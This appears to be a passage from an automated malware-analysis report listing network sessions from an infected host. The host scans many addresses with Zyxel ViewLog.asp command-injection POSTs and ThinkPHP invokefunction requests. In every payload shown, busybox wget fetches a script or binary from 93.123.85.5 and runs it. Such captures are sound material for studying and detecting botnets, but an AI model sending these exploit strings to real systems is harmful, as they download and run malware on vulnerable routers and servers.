                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              284192.168.2.234643662.29.84.1048080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.508090019 CET6370OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              285192.168.2.236020094.121.191.2228080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.508173943 CET6371OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              286192.168.2.233469295.0.153.21080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.820921898 CET6447OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:52.165208101 CET6491INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 20:56:54 GMT
                                                              Server: Apache/2.4.29 (Ubuntu)
                                                              Content-Length: 310
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 66 69 6c 65 2e 63 6f 62 72 61 6e 64 74 72 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at file.cobrandtr.com Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              287192.168.2.235245431.44.138.748080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.831326008 CET6449OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              288192.168.2.234337495.131.78.1888080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.844059944 CET6450OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:52.229593992 CET6493INHTTP/1.1 403 Forbidden
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 106
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              289192.168.2.234194495.142.203.23680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.850965977 CET6451OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:52.235703945 CET6494INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:52 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              X-CDN-Node: mail4-11
                                                              X-Req-Id: 89187ef7cc893758d4c1c7e37f945eb4
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              29192.168.2.233624831.136.231.1488080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:11.565016985 CET1535OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:12.563838959 CET1650OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:14.547579050 CET1884OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:18.707104921 CET2353OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:26.642014027 CET3343OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:42.511970997 CET5271OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:16.043598890 CET9444OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              29094.228.183.388080192.168.2.2336598
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:52.096580029 CET6486INHTTP/1.0 400 Bad Request
                                                              Server: httpd
                                                              Date: Mon, 13 Nov 2023 21:18:51 GMT
                                                              Content-Type: text/html
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              291192.168.2.236072095.211.116.13480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:52.473195076 CET6499OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:52.774254084 CET6526INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:51 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              292192.168.2.235969685.122.221.28080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:52.496570110 CET6500OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              293192.168.2.234034095.101.89.20380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:52.505731106 CET6501OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:52.837610006 CET6598INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:18:52 GMT
                                                              Date: Mon, 13 Nov 2023 21:18:52 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 31 64 64 35 31 37 26 23 34 36 3b 31 36 39 39 39 31 30 33 33 32 26 23 34 36 3b 37 38 66 37 63 38 63 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;41dd517&#46;1699910332&#46;78f7c8ce</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              294192.168.2.233593862.29.31.2248080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:52.535765886 CET6501OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              295192.168.2.234699094.120.52.498080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:52.538594007 CET6502OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              296192.168.2.235335495.57.6.8480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:52.645215988 CET6503OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:53.039535999 CET6610INHTTP/1.1 200 OK
                                                              Nov 13, 2023 22:18:53.039676905 CET6611INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                              Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              297192.168.2.234299695.183.12.1368080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:52.941648960 CET6600OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:53.386571884 CET6619INHTTP/1.1 404 Not Found
                                                              Date: Mon, 13 Nov 2023 21:18:54 GMT
                                                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/7.2.17
                                                              Content-Length: 217
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              298192.168.2.234589431.170.55.2098080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:53.348052025 CET6618OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              299192.168.2.235319288.138.7.16380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:54.346250057 CET6731OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:55.278592110 CET6847OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:57.134071112 CET7085OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
